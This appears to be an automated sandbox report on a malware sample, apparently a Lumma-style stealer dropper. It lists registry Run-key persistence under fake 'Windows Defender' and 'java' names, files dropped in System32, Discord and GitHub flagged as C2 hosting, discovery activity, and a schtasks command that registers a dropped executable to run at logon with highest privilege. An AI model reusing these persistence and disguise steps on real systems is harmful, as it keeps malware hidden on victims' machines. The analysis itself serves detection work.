| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDataUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDataUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HOME = "C:\\Windows\\system32\\javaw.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaUp = "C:\\Windows\\system32\\java.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdater = "C:\\Windows\\system32\\WinBioData\\WindowsDefenderUpdater.exe" | C:\Windows\system32\reg.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\java.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\SubDir\x.exe | C:\Users\Admin\AppData\Local\Temp\Files\x.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\SubDir\x.exe | C:\Users\Admin\AppData\Local\Temp\Files\x.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\onetap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\LummaC22222.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\jtkhikadjthsad.exe | N/A |
Delays execution with timeout.exe
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | N/A | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Files\x.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe | N/A |
| N/A | N/A | C:\Windows\system32\WinBioData\WindowsDataUpdater.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lummnew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\build9.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build9.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe"
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\jerniuiopu.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
